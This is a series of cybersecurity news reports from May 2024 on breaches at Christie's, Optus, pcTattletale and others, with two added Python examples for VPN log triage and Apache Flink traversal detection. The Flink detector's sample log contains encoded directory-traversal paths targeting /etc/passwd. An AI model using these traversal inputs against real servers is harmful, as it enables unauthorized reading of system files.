WD is offering 24 months of complimentary credit monitoring services through Experian to enrolled individuals. The company also stated that it would implement additional cybersecurity tools and review existing policies and procedures to prevent similar incidents from occurring in the future. WD also stated that it had shared details of the investigation with relevant federal law enforcement and would notify relevant regulators, as legally required.

Strauss Borrelli PLLC Investigation Into Data Breach

The Strauss Borrelli PLLC law firm announced on its site that it would be interested in discussing further rights and potential legal remedies with individuals who received the recent data breach notification letter from WD & Associates, Inc. Individuals can contact the law firm by phone at 872.263.1100 or by e-mail at sam@straussborrelli.com. Individuals should also remain vigilant against identity theft and fraud by regularly reviewing account statements and explanations of benefits, and by monitoring free credit reports for suspicious activity. Additionally, U.S. consumers are legally entitled to one free credit report annually from each of the three major credit reporting bureaus (Equifax, Experian, and TransUnion). To request a free credit report, visit www.annualcreditreport.com or call 1-877-322-8228. Consumers also have the option to place a fraud alert or a credit freeze on their credit file at no cost. Suspicious activity should be reported promptly to relevant parties, including insurance companies, healthcare providers, and financial institutions. WD & Associates affirmed its commitment to protecting the privacy and security of its clients' information and said the company would continue to provide updates and further information as they become available.

Check Point VPN Fix Released After Researchers Observe Malicious Access Attempts

By: Alan J
28 May 2024 at 11:53

Check Point VPN Network infrastructure

Check Point researchers have observed a surge in threat actor groups targeting remote-access VPN environments as an entry point for gaining access to enterprise networks. In response to these threats, Check Point has been monitoring unauthorized access attempts on Check Point VPNs and has released a preventative solution to address the issue. While the researchers suggested that the issue is broader than Check Point VPNs, the fix applies solely to Check Point environments.

Identification of Unauthorized Access Attempts to Check Point VPN

On May 24, Check Point identified a small number of login attempts using old VPN local accounts that relied on an unrecommended password-only authentication method. The company assembled special teams of Incident Response, Research, Technical Services, and Products professionals to thoroughly investigate these attempts and any other potentially related incidents. Within 24 hours, the teams identified several customers who had potentially been subject to similar attempts and notified them accordingly. The teams consider password-only authentication insecure and more susceptible to compromise of network infrastructure, and recommend against relying solely on it when logging into network infrastructure. The teams advised several preventative measures, including:
  • Reviewing and disabling unused local accounts.
  • Implementing an additional layer of authentication, such as certificates, to password-only accounts.
  • Deploying additional solutions on Security Gateways to automatically block unauthorized access.
  • Contacting the Check Point technical support team or a local representative for additional guidance and assistance.
In case of suspected unauthorized access attempts, Check Point researchers recommend that organizations analyze all remote access connections of local accounts with password-only authentication, monitor connection logs from the past 3 months, and verify that the user details, time, source IP address, client name, OS name, and application are familiar given the configured users and business needs. Check Point has also released a hotfix that prevents users with password-only authentication from connecting to Security Gateways. Once it is installed, local accounts using password-only authentication are prevented from logging into the Check Point Remote Access VPN. If any connections or users cannot be validated, invoking the incident response playbook or contacting Check Point Support or a local Check Point representative is advised. The company stated that it has witnessed the compromise of several VPN solutions, including those of various cybersecurity vendors.
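The log review described above, as an added example that is not Check Point's own tooling or log format: it walks constructed Check Point-style remote-access connection records, keeps only password-only logins inside the 3-month window, and flags any whose user, source IP, client or OS does not match a baseline of expected local accounts. The comma-separated record layout, the sample lines, the `EXPECTED` baseline and the `review` function are all assumptions made for illustration.

```python
"""Triage remote-access VPN connection records for password-only local accounts.

Added illustration, not Check Point's own tooling: the comma-separated record
layout, the sample log lines, and the EXPECTED baseline are constructed here.
Real data would be exported from the Security Gateway logs and mapped onto the
same fields (user, time, source IP, client name, OS name, application, auth).
"""
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, NamedTuple, Set


class Connection(NamedTuple):
    user: str
    time: datetime
    src_ip: str
    client: str
    os_name: str
    app: str
    auth: str  # constructed labels: "password" or "password+certificate"


class Finding(NamedTuple):
    user: str
    time: datetime
    reasons: List[str]


# Constructed sample records (timestamp,user,src_ip,client,os,app,auth).
SAMPLE_LOG = [
    "2024-05-24T02:13:00Z,vpn-legacy01,203.0.113.45,Endpoint Security VPN,Windows 10,Remote Access VPN,password",
    "2024-05-24T09:30:00Z,j.doe,198.51.100.8,Endpoint Security VPN,Windows 11,Remote Access VPN,password+certificate",
    "2024-02-10T08:00:00Z,vpn-legacy02,203.0.113.77,SecuRemote,Windows 7,Remote Access VPN,password",
    "2024-01-05T08:00:00Z,vpn-legacy02,203.0.113.77,SecuRemote,Windows 7,Remote Access VPN,password",
    "2024-05-25T22:41:00Z,j.doe,203.0.113.45,Capsule VPN,Android 12,Remote Access VPN,password",
]

# Constructed baseline: what the business expects for each local account.
# Accounts absent from this map have no documented owner or use.
EXPECTED: Dict[str, Dict[str, Set[str]]] = {
    "j.doe": {
        "src_ips": {"198.51.100.8"},
        "clients": {"Endpoint Security VPN"},
        "os": {"Windows 11"},
    },
}

# Review date for the sample (fixed so the 3-month window is reproducible).
NOW = datetime(2024, 5, 27, 12, 0, tzinfo=timezone.utc)


def parse_log(lines: Iterable[str]) -> List[Connection]:
    """Parse the constructed CSV layout into Connection records (UTC times)."""
    records = []
    for line in lines:
        ts, user, src_ip, client, os_name, app, auth = line.strip().split(",")
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        records.append(Connection(user, when, src_ip, client, os_name, app, auth))
    return records


def password_only_accounts(records: Iterable[Connection]) -> Set[str]:
    """Accounts that ever logged in with password-only auth: the candidates
    for disabling (if unused) or for adding a certificate factor."""
    return {r.user for r in records if r.auth == "password"}


def review(records: Iterable[Connection], expected: Dict[str, Dict[str, Set[str]]],
           now: datetime, window_days: int = 90) -> List[Finding]:
    """Flag password-only logins inside the window whose details are unfamiliar."""
    cutoff = now - timedelta(days=window_days)
    findings = []
    for r in records:
        if r.time < cutoff or r.auth != "password":
            continue  # only recent password-only logins are in scope
        reasons = ["password-only authentication"]
        profile = expected.get(r.user)
        if profile is None:
            reasons.append("account not in expected-user baseline")
        else:
            if r.src_ip not in profile["src_ips"]:
                reasons.append(f"unfamiliar source IP {r.src_ip}")
            if r.client not in profile["clients"]:
                reasons.append(f"unfamiliar client {r.client}")
            if r.os_name not in profile["os"]:
                reasons.append(f"unfamiliar OS {r.os_name}")
        findings.append(Finding(r.user, r.time, reasons))
    return findings


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("password-only accounts:", sorted(password_only_accounts(recs)))
    for f in review(recs, EXPECTED, NOW):
        print(f.time.isoformat(), f.user, "; ".join(f.reasons))
```

Every finding is a connection to validate against the incident response playbook; the 2024-01 and 2024-02 records fall outside the 90-day window and are left out, which is why the window should be widened if the account history warrants it.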

Implementing Check Point VPN Hotfix

Check Point released a script to identify potential risks of compromise in its VPN environment. Enterprises can download the VPNcheck_v2.zip archive and follow the steps on the solution page. If the script identifies local accounts with password-only authentication, users can optionally proceed with the installation of the Security Gateway Hotfix. The hotfix is available via the Check Point Upgrade Service Engine (CPUSE) or through manual download. The hotfix adds a new command, blockSFAInternalUsers, to the Security Gateway, allowing admins to block or grant access to internal users with password-only authentication. The default value blocks internal users from connecting with password-only authentication. After the hotfix is installed, connection attempts using the weak password-only authentication method are blocked and recorded in the security log as failed. As remote operations and online threats rise, organizations must prioritize stronger VPN authentication methods while monitoring for unauthorized attempts to access these environments. Failure to do so can lead to compromised network infrastructure or assets, data breaches, and significant financial and reputational damage.

RansomHub Claims Responsibility for Christie’s Cyberattack

By: Alan J
28 May 2024 at 10:17

cyberattack on Christie's auction house

The notorious ransomware gang RansomHub has claimed responsibility for a recent cyberattack on Christie's auction house, disrupting its website just days before its marquee spring sales and leaking data to back up its claims. The group posted a message on its dark web leak site claiming to have gained access to compromised information about the world's wealthiest art collectors. Christie's officials downplayed the seriousness of the breach, however, and said that no financial or transactional data was compromised in the attack.

RansomHub Claims Cyberattack on Christie's Auction House

The attack, which occurred two weeks ago, brought down Christie's official website, forcing the auction firm to fall back on methods such as an alternative domain to reach potential buyers and sellers ahead of its highly anticipated spring sales, which the company announced would proceed despite the setbacks. The sales were scheduled to take place at multiple locations, including New York and Geneva, and were estimated to fetch 850 million dollars from buyers. The RansomHub ransomware gang has now claimed responsibility for the attack on its leak site, stating that it compromised about 2GB of data from the auction giant during the initial network compromise. The details were said to include BirthPlace, MRZFull, DocumentNumber, BirthDate, ExpiryDate, FirstName, LastName, IssueDate, IssuingAuthority, DocumentCategory, DocumentType and NationalityName.

[Image: Christie's RansomHub Auction House leak site post. Source: X.com (@AlvieriD)]

The threat actor group said it had attempted to come to a "reasonable solution," but that Christie's had ceased communications midway and failed to pay the demanded ransom. The group shared an alleged sample of the stolen data.

[Image: RansomHub Christie's Auction House ransomware sample. Source: X.com (@AlvieriD)]

The hackers warned that Christie's would face heavy fines under the EU's General Data Protection Regulation (GDPR) and reputational damage among its clients. The GDPR mandates that EU companies disclose security incidents that compromise client data, with non-compliance potentially leading to fines of up to $22 million. Cybersecurity experts describe RansomHub as a powerful ransomware group with possible ties to ALPHV, a network of Russian-speaking extortionists.

Christie's Auction House Downplays Data Leak

Christie's acknowledged the cyberattack and unauthorized access, with spokesman Edward Lewine stating that the auction house is investigating the incident. Preliminary findings indicate that the hackers obtained a limited amount of personal client data but stopped short of compromising financial or transactional records. Christie's CEO Guillaume Cerutti also stated in a recent interview with CNBC that there was no evidence that any transaction or financial data had been impacted or leaked in the incident. The company had earlier appeared to downplay the impact of the incident, describing it as a "technology security incident." However, employees privately reported a sense of panic, with limited information about the breach shared by top leaders. Several prominent buyers and sellers also told the New York Times that they were in the dark about the impact and were not alerted to the hack until a reporter reached out to them. Lewine stated that the auction house was now in the process of notifying privacy regulators and government agencies, and would also be notifying affected clients shortly. Despite the attack, the spring sales concluded with $528 million in revenue, suggesting the incident did not significantly deter bidding. Following the sales, Christie's regained control of its website.

Greek PDPA Fines Ministry of Interior and MEP Asimakopoulou in β€˜Email-Gate’ Scandal

By: Alan J
28 May 2024 at 05:08

Greek Ministry of Interior email-gate

The Greek Personal Data Protection Authority (PDPA) has imposed significant fines on the Greek Ministry of Interior and New Democracy MEP Anna-Michelle Asimakopoulou for their roles in violating data protection regulations in the 'email-gate' scandal. The fines come after an investigation into the "email-gate" scandal, in which Asimakopoulou was accused of sending unsolicited emails to Greeks living abroad ahead of the European Parliament elections in June.

Ministry of Interior Violations and Consequences

The authority found that a file of 25,000 voters registered for the June 2023 elections had been leaked between June 8 and 23, 2023. The list, which included voter emails, was sent to New Democracy's then Secretary for Diaspora Affairs, Nikos Theodoropoulos, by an unknown individual. Theodoropoulos forwarded the file to MEP Asimakopoulou, who used it to send mass campaign emails in violation of data protection laws and basic principles of legality.

[Image: MEP Anna-Michelle Asimakopoulou. Source: Shutterstock]

On receiving the unsolicited emails to their private accounts, several Greek diaspora voters living abroad expressed their surprise on social media and accused the New Democracy MEP of violating the European Union's General Data Protection Regulation (GDPR). The expats questioned how the MEP had obtained the addresses used in the email campaigns. Asimakopoulou earlier attempted to refute allegations of violating these data protection laws but was found to have provided contradictory explanations regarding the source from which the addresses were obtained for use in the mass email campaign. As a result, the Ministry of Interior faces a 400,000-euro fine, while Asimakopoulou faces a 40,000-euro fine. The authority also postponed its verdict on Theodoropoulos and the New Democracy party to examine new claims related to the investigation. The PDPA stated in its investigation that the use of the emails "was in violation of the basic principle of legality, objectivity and transparency of processing, as it was in violation of a series of provisions of the electoral legislation and furthermore could not reasonably be expected." The ministry said it will "thoroughly study" the authority's decision to consider further legal actions.
The "email-gate" scandal has led to significant consequences, including the resignation of the general secretary of the Interior Ministry, Michalis Stavrianoudakis, and the dismissal of Theodoropoulos by New Democracy. Asimakopoulou has announced she will not run in the European Parliament elections. Asimakopoulou is also facing 75 lawsuits by citizens and over 200 lawsuits from the Interior Ministry over the scandal.

Reaction of Opposition Parties to the Investigation Results

Opposition parties are now demanding the resignation of Interior Minister Niki Kerameos following the outcome of the investigation into the unsolicited emails.

[Image: Interior Minister Niki Kerameos. Source: Shutterstock]

The main opposition party SYRIZA released a statement asserting that "private data were being passed around for months among the Interior Ministry, ND, and at least one election candidate," questioning whether the email list had been leaked to other New Democracy candidates by the Interior Ministry. While the Interior Minister might not have been directly involved, SYRIZA claimed that "Kerameos did not have the guts to show up at the Committee on Institutions and Transparency." The Socialist PASOK Party also demanded Kerameos' resignation, adding that the violation shows the government to be "incapable of fulfilling the self-evident, as proven by the high fines."

Pakistan’s Islamabad’s Safe City Authority Online System Down After Hack

By: Alan J
27 May 2024 at 09:37

Islamabad's Safe City Authority

Islamabad's Safe City Authority experienced a significant disruption when its online system was breached by hackers, prompting an immediate shutdown. The Safe City Islamabad Project, initiated by the PPP-led government and backed by a Chinese government concessional loan, aimed to enhance the capital's surveillance and security capabilities with the installation of 1,950 CCTV cameras, a bomb-proof command center, a 4G communication network, and advanced monitoring systems such as facial recognition technology. This unforeseen event has raised concerns over the security and the vulnerability of the system, as law enforcement officials scramble to assess the damage and restore operations.

Islamabad's Safe City Authority Breach and Initial Response

The breach revealed several systemic weaknesses within the Safe City Authority's digital infrastructure. Hackers successfully infiltrated the primary server, gaining unauthorized access to databases containing criminal records and sensitive information. While the system's firewall did issue an alert upon detecting the intrusion, the absence of backup servers and contingency plans forced a complete shutdown of the affected software and applications. The assault compromised several integral systems, including the Complaint Management System, Criminal Management Record System, and Human Resource Management System, along with software and applications vital for the Operation Division.

[Image: Pakistan Islamabad's Safe City Authority Online System. Source: china.aiddata.org]

The compromise of these systems impacted several critical services tied to the Safe City initiative, including mobile applications, smart police vehicle records, police station data, video analytics, Islamabad Traffic Police, e-challan systems, and records from the operations division. Approximately 13 to 15 servers provided by the police facilitation center F-6 were also affected. An officer told Dawn, Pakistan's largest English newspaper, that this incident was not a typical hacking scenario involving stolen login credentials. Instead, the system's vulnerability stemmed from officials' use of simple and common login IDs and passwords, making it easier for hackers to gain access. Additionally, many of the software and applications were found to be outdated or running on expired licenses, further compromising the system's security. Despite the breach of several systems, the Safe City cameras' management system, which operated independently through offline direct lines, remained secure, demonstrating the effectiveness of isolated systems in safeguarding against such attacks.
Police spokesperson Taqi Jawad confirmed the intrusion as an attempted breach that triggered the firewall's alarm but stated that appropriate precautionary measures had been taken. "All logins have been closed for the past two days to change them, including those of police stations and officers at various ranks," he stated. Jawad refrained from sharing further specifics on the server shutdowns, saying they were still pending technical feedback.

Controversy Over Islamabad's Safe City Authority

Islamabad's Safe City project has been a source of serious controversy, with several litigations over contract transparency and cost inflation leading to the Supreme Court's order to cancel the initial contract with Huawei in 2012. The contract was later renegotiated, and the project resumed under the PMLN (Pakistan Muslim League) government, with the command center becoming operational in 2016. By 2016, 1,805 cameras were installed, and as of 2021, 95% remained functional. Despite the extensive infrastructure, police sources claimed in 2022 that the system had not prevented any incidents or facilitated any arrests, raising questions about its effectiveness. Due to financial strain, Pakistan and China Eximbank signed several debt suspension agreements from July 2020 to December 2021, temporarily suspending principal and interest payments under the concessional loan agreement. Tragically, the project's director was found dead in July 2022 in an apparent suicide. The successful breach of the authority's systems draws additional controversy towards the project, which was intended to be a cornerstone of Islamabad's security infrastructure but has encountered several operational, legal, and financial setbacks.

Federal Court Denies Optus Appeal to Withhold Deloitte Report on 2022 Cyberattack

By: Alan J
27 May 2024 at 07:14

Optus Australia 2022 Data Breach Deloitte Report

Optus, one of Australia's largest telecommunications companies, has lost a legal battle in the Federal Court. The Australian Federal Court has ordered the company to release an external review performed by Deloitte to investigate the cause of a significant 2022 cyberattack that led to the release of sensitive customer data. The Optus 2022 data breach resulted in the exposure of the names, dates of birth, phone numbers, and email addresses of over 10 million customers with addresses, driver's licence or passport numbers being exposed for a portion of the affected customers.

Optus Appeal Against Sharing External Deloitte Report

The data breach incident, along with a 14-hour outage of its telecommunication services, frustrations over the availability of information and credit monitoring services, and attackers' attempts to exploit the compromised data in SMS phishing attacks, led to intense scrutiny of the company.

[Image: Optus Deloitte External Report 2022 Data Breach. Source: www.optus.com.au/support/cyberresponse]

The company commissioned an independent external forensic review of the cyberattack from Deloitte, covering its security systems, controls and processes, on the advice of then CEO Kelly Bayer Rosmarin and with the approval of its board. Bayer Rosmarin made the following statement on the decision:
"This review will help ensure we understand how it occurred and how we can prevent it from occurring again. It will help inform the response to the incident for Optus. This may also help others in the private and public sector where sensitive data is held and risk of cyberattack exists."
Kelly Bayer Rosmarin later resigned over the incident, and Optus is now led by a new CEO, who is working to rebuild trust with customers in a 'challenging' market. Despite the company's efforts to deal with the data breach, the recent court decision comes after Optus appealed an earlier ruling that it must hand over the report to Slater & Gordon, the law firm pursuing a class action against the company for allegedly failing to protect its customers' personal information. Optus has not yet made a public statement regarding the Federal Court's decision. However, the company had previously argued that the Deloitte report was commissioned to provide legal advice and was therefore privileged. The court decided that Optus had failed to prove that the dominant purpose of the report was legal advice.

Class Action Law Suit Against Optus and Implications of Court Ruling

Slater & Gordon, the law firm representing the affected Optus customers, has welcomed the court's decision. The law firm's class actions practice group leader, Ben Hardwick, criticized Optus's efforts to keep the report confidential, stating that it indicates the company's refusal to accept responsibility for its role in the data breach and its impact on millions of its customers. In its April 2023 press release, the law firm's leader had stated that more than 100,000 of Optus's current and former customers had registered for the class action, with some notable examples among the group such as:
  • a domestic violence victim who spent money that was intended for counselling for her children on increasing security measures around the house, including installing video cameras and extra locks on doors and windows
  • a former Optus customer who had previously been burgled and had his identity stolen who now suffers severe anxiety after learning his personal information had been shared online
  • a stalking victim who takes extreme measure to maintain her privacy, especially her address, who fears her life has genuinely been put in danger by the data breach
  • a woman who is now too fearful to answer the telephone after noticing an increase in scam phone calls following the Optus cyberattack, and
  • a retired police officer concerned that his home address may have been shared with criminals he was involved in the prosecution and incarceration of.
The press release also cited the frustration several customers expressed over alleged delays by Optus in providing details of the data breach, and reported inconsistencies in how the telecommunications giant had been treating affected customers. Some Optus registrants told the law firm that they were dismissed when they sought further information from Optus, while others said the company refused to pay for credit monitoring services on the basis that they were no longer Optus customers. "There appears to have been a piecemeal response from Optus, rather than a coordinated approach that made sure everyone whose data was compromised is treated the same." The Federal Court's decision sets a significant precedent for companies involved in data breaches. It underscores the importance of transparency and accountability in such situations, and it may encourage other companies to take stronger measures to protect their customers' personal information.

Amazon Secures pcTattletale Spyware AWS Infrastructure After Hack Reveals 17TB of Data

By: Alan J
27 May 2024 at 05:06

pcTattletale spyware AWS Lock

Soon after an independent researcher exposed a vulnerability in the commercial-grade pcTattletale spyware tool that could compromise recordings, the tool’s website was hacked and defaced. The hacker claimed to have accessed at least 17TB of victim screenshots and other sensitive data, viewing the site's hacking as a personal challenge after a researcher's limited disclosure to prevent exploitation of the flaw by bad actors. Amazon promptly placed an official lock on the site's AWS infrastructure following the hacking incident. The pcTattletale spyware's flawed architecture and its discovery demonstrate the inherent vulnerabilities present in common spyware applications, potentially impacting not just individuals but entire organizations and families.

pcTattletale Spyware Vulnerabilities and Poor Data Handling Practices

The pcTattletale spyware tool offered a live feed of screenshots from the victim's device as its primary feature, alongside typical spyware functionalities like location tracking. However, this extensive monitoring feature, built on poor infrastructure and data-handling practices, has also been its downfall, with data breaches exposing the private data of targets. First, a 2021 data breach incident demonstrated Insecure Direct Object Reference (IDOR) vulnerabilities in the spyware tool's domain infrastructure, potentially allowing access to sensitive data through guessable Amazon S3 URLs. Last week, researcher Eric Daigle uncovered an API bug that also potentially allowed access to sensitive data across registered devices. This vulnerability allowed unauthorized users to access private information in the form of comprehensive screen recordings. A subsequent hack then exposed pcTattletale's backend to the public, revealing an astonishing disregard for secure practices. The hacker discovered that the spyware shipped with hardcoded AWS credentials, accessible via a hidden webshell, potentially enabling years of undetected data exfiltration. This oversight, remarkable for its simplicity and duration, underscores a major failure in the handling of user data.

pcTattletale Spyware Latest Hack

The hacker defaced pcTattletale's official site, replacing it with a writeup of the operation and links to compromised data obtained from the site's AWS infrastructure. The volume of data stored by pcTattletale was overwhelming, with the hacker reporting the discovery of over 17 terabytes of victim device screenshots from more than 10,000 devices, some dating back to 2018. Although the released data dump did not include these screenshots, it reportedly contained database dumps, full webroot files for the stalkerware service, and other S3 bucket contents, exposing years of sensitive information.

[Image: pcTattletale spyware site defaced. Source: archive.org]

The breach also uncovered a simple webshell hidden since at least December 2011 in the spyware's backend code. This backdoor allowed arbitrary PHP code execution through the use of cookies, raising questions about its origin: whether it was placed by pcTattletale itself as a backdoor or by a threat actor. The hacker later updated the defaced site with a video, claiming it showed pcTattletale's founder attempting to restore the site. It took over 20 hours for the defaced website to be taken down, with pcTattletale's service continuing to send screenshots to the S3 bucket until Amazon officially locked down the spyware service's AWS account.

[Image: pcTattletale Spyware AWS Amazon Lock. Source: ericdaigle.ca]

Following the official lockdown of the site's AWS infrastructure, security researcher Eric Daigle expanded his earlier limited disclosure with a step-by-step exploit of the flaw he had found. He noted that while the site's attacker exploited an unrelated flaw, it was about equally trivial in its complexity.

Victims Affected by pcTattletale Spyware Data Leak

The pcTattletale data leak is particularly alarming because several organizations employed the tool to monitor employees and clients, exposing confidential information across various sectors, including banks, law firms, educational institutions, healthcare providers and even government agencies. Notable victims affected by the data breach, as identified by security researcher maia crimew, who explored the incident and shared data in a blog article, include:
  • Hotels leaking guest information such as personal data and credit card details.
  • Law firms exposing lawyer-client communications and client bank-routing information.
  • A bank revealing confidential client data.
  • Educational institutions such as schools and childcare centers monitoring employees or students, revealing personal data.
  • Healthcare providers exposing patient information.
  • A Palestinian government agency employee being monitored.
  • The HR department of a Boeing supplier revealing personal information of employees.
  • Tech companies secretly installing pcTattletale on employee devices suspected of wrongdoing, exposing internal systems and source code.
  • A bug bounty hunter who installed the software for pentesting, then immediately tried to uninstall it.
Concerningly, the spyware was also marketed to parents and spouses as a way to keep tabs on their children and partners respectively, potentially exposing that information in the resulting breach.

(Image: sample of the leaked pcTattletale data. Source: maia.crimew.gay)

Given the wide range of affected companies and the significant security lapses, maia crimew noted that pcTattletale could face severe repercussions, possibly including a cessation of its operations: the Federal Trade Commission (FTC) has previously ordered other US stalkerware developers to cease operations following breaches, and pcTattletale's case is poised for similar consequences. The widespread misuse and systemic security failures of pcTattletale highlight the dangers inherent in stalkerware software and services, as well as the urgent need for stringent regulatory oversight and robust security measures for these tools to protect the data and privacy of individuals and organizations.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Researcher Indicates pcTattletale Stalkerware Found on US Hotels, Corporate and Law Firm Computers Leaks Recordings

By: Alan J
24 May 2024 at 12:33

PCTattletale Stalkerware Screen Recordings

An independent researcher claims that the commercial-grade spyware tool pcTattletale leaks live screen recordings/screenshots to the internet, making them accessible to anyone and not just the app's intended users. The pcTattletale stalkerware sees wide usage and has been discovered on hotel guest check-in computers, corporate systems and computers used by law firms across the United States. The app markets itself to parents, spouses/partners and enterprises with the promise of discreet, instant, real-time monitoring and easy installation.

pcTattletale Stalkerware Reportedly Leaks Screen Recordings

The pcTattletale spyware tool primarily advertises itself to parents concerned about their children's social media usage and to businesses aiming to monitor employees, claiming to offer a window into the online world of children and into disruptions to the daily workflow of employees. The tool is available for installation on both Windows and Android. While the site claims this tracking is safe, Eric Daigle, an independent security researcher, claims to have discovered a flaw in the spyware's API that allows attackers to obtain the most recent screen capture from any device with the tool installed.

Reached by the Cyber Express team, Daigle shared some additional details on the purported vulnerability. The researcher said the tool allows users to sign up on the website, after which they are given custom .exe or .apk files to install on the target's device. The customized file is hardcoded with the user's credentials, Daigle said, which reduces installation to essentially two clicks, the only other real input being acceptance of the permission requests needed to capture the screen. After installation, the spyware's user can log in to the website to trigger or access screen captures. However, Daigle said the recordings he observed were not video files but static screenshots taken a few seconds apart, stitched together and played as a .GIF file to produce the desired recording of the target.

Daigle said many U.S. hotels, corporate computers and at least two law firms appeared to be compromised and vulnerable to the flaw. However, the researcher expressed his desire to keep further details about the victims anonymous for privacy reasons, and to withhold details on exploiting the flaw to prevent potential attackers from taking advantage of it.

The researcher was also unclear whether the software had been installed by the corporate owners, as advertised as a use case on the pcTattletale website, or by other actors. He highlighted the serious consequences and potential impact of leaking live screen recordings, such as the exposure of sensitive personal information, financial information or captured passwords. The researcher said he had contacted the spyware vendor about the vulnerability but was ignored, and indicated that he would be ready to publish a full write-up of the flaw once it had been patched. The pcTattletale site appeared to be down at the time of publishing this article.

Spyware/Stalkerware Tools Remain a Major Concern

Spyware tools pose serious inherent risks beyond their intended purposes, as they can be exploited to violate the privacy of all kinds of individuals or groups. In 2023, researchers observed a Spanish spyware vendor's tools employing multiple zero-days and n-days in its exploit chain and delivering the spyware module through one-time links in SMS messages; these tools were used against targets in the United Arab Emirates (UAE). Last month, Apple issued notifications to users in 92 countries to alert them of mercenary spyware attacks. In the same month, the United States government imposed visa restrictions on individuals identified as being connected to, or profiting from, the use or proliferation of commercial spyware. In its notice, the U.S. government cited concerns over the use of these tools to facilitate human rights abuses or counter-intelligence efforts as justification for the restrictions. Several of these concerns are shared by privacy advocates, groups such as the Coalition Against Stalkerware and non-profit organizations such as the U.S. National Cybersecurity Alliance. The National Cybersecurity Alliance defines the use of these tools against targets as a form of abuse on its Stay Safe Online website.

CISA Says 4-Year-Old Apache Flink Vulnerability Still Under Active Exploitation

By: Alan J
24 May 2024 at 07:41

Apache Flink Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a four-year-old security flaw affecting Apache Flink to its Known Exploited Vulnerabilities (KEV) catalog, following evidence of active exploitation. The flaw, tracked as CVE-2020-17519, poses significant risk due to improper access control that allows unauthorized access to sensitive files.

Researchers Observed Active Exploitation of Apache Flink Vulnerability

CISA describes vulnerabilities added to its Known Exploited Vulnerabilities catalog, such as this Apache Flink flaw, as "frequent attack vectors for malicious cyber actors" that pose significant risks to the federal enterprise. The catalog serves as a critical resource for identifying and mitigating vulnerabilities actively in use.

CVE-2020-17519 is a critical vulnerability in Apache Flink, an open-source framework for stream and batch processing. The flaw arises from improper access control in versions 1.11.0, 1.11.1 and 1.11.2 of the framework, allowing remote attackers to read files from the local filesystem of the JobManager through specially crafted directory traversal requests to its REST interface. While precise details of the ongoing campaigns exploiting the vulnerability remain unclear, the bug has existed for at least four years and has been acknowledged by the project maintainers. The Apache Flink advisory states:
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process.
The discovery of the vulnerability was credited to "0rich1" of Ant Security FG Lab, and working exploit code for it is available on the public web. Around the time of its disclosure, researchers from Palo Alto Networks observed the vulnerability among the most commonly exploited vulnerabilities of the winter 2020 period, based on data collected between November 2020 and January 2021.
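As an added example (not code from the Flink project, CISA or the article), here is a Python check a defender could run on two of the facts above: it flags JobManager versions in the affected 1.11.0 to 1.11.2 range (with 1.11.3 and 1.12.0 as the fixed releases named in the project's guidance) and scans access-log lines from a reverse proxy in front of the JobManager REST port for directory-traversal requests, normalising plain, single- and double-percent-encoded forms before looking for a `..` segment. The log lines are constructed; the encodings are shown as general traversal evasions rather than as the specific request used against Flink, and the response statuses are illustrative.

```python
import re
from urllib.parse import unquote

# CVE-2020-17519 affects Apache Flink 1.11.0, 1.11.1 and 1.11.2; the fix shipped
# in 1.11.3 and 1.12.0. The JobManager REST interface could be made to return
# arbitrary files readable by the JobManager process via directory traversal.
AFFECTED_VERSIONS = {(1, 11, 0), (1, 11, 1), (1, 11, 2)}


def parse_version(text):
    """Turn a Flink version string such as '1.11.2' into a (major, minor, patch) tuple."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unrecognised Flink version: %r" % text)
    return tuple(int(x) for x in m.groups())


def is_affected(text):
    """True if a JobManager reporting this version needs the CVE-2020-17519 upgrade."""
    return parse_version(text) in AFFECTED_VERSIONS


def decode_path(raw, max_rounds=3):
    """Percent-decode repeatedly so that double-encoded sequences ('%252e%252e%252f')
    are normalised the same way single-encoded or plain '../' are. Backslashes are
    folded into forward slashes so '..\\' segments are caught as well."""
    path = raw
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(raw_path):
    """True if the decoded request path contains a '..' path segment."""
    return ".." in decode_path(raw_path).split("/")


# Common log format: ... "GET /path HTTP/1.1" 200 ...
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def traversal_attempts(lines):
    """Return (path, status) for every request whose path decodes to a traversal attempt.
    A 200 on such a request is the signal that the JobManager actually served a file."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if m and is_traversal(m.group("path")):
            hits.append((m.group("path"), int(m.group("status"))))
    return hits


# Constructed sample reverse-proxy log lines in front of a Flink JobManager REST port.
# They show plain, single-encoded and double-encoded traversal; they are not a capture
# of real traffic, and the statuses are illustrative, not a statement about which
# encoding a given Flink build accepted.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/May/2024:07:41:00 +0000] "GET /jobs/overview HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/May/2024:07:41:02 +0000] "GET /jobmanager/logs/../../etc/passwd HTTP/1.1" 404 0',
    '10.0.0.9 - - [24/May/2024:07:41:03 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fpasswd HTTP/1.1" 404 0',
    '10.0.0.9 - - [24/May/2024:07:41:04 +0000] "GET /jobmanager/logs/..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1830',
    '10.0.0.7 - - [24/May/2024:07:41:05 +0000] "GET /taskmanagers HTTP/1.1" 200 740',
]

if __name__ == "__main__":
    print("1.11.2 affected:", is_affected("1.11.2"))
    print("1.11.3 affected:", is_affected("1.11.3"))
    for path, status in traversal_attempts(SAMPLE_LOG):
        print(status, path)
```

Decoding in a loop rather than once matters here: a filter that decodes a single time sees `..%2f` after the first pass and never compares it against `../`, which is exactly the kind of gap traversal payloads are crafted to slip through.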

Mitigation Measures and Binding Directives

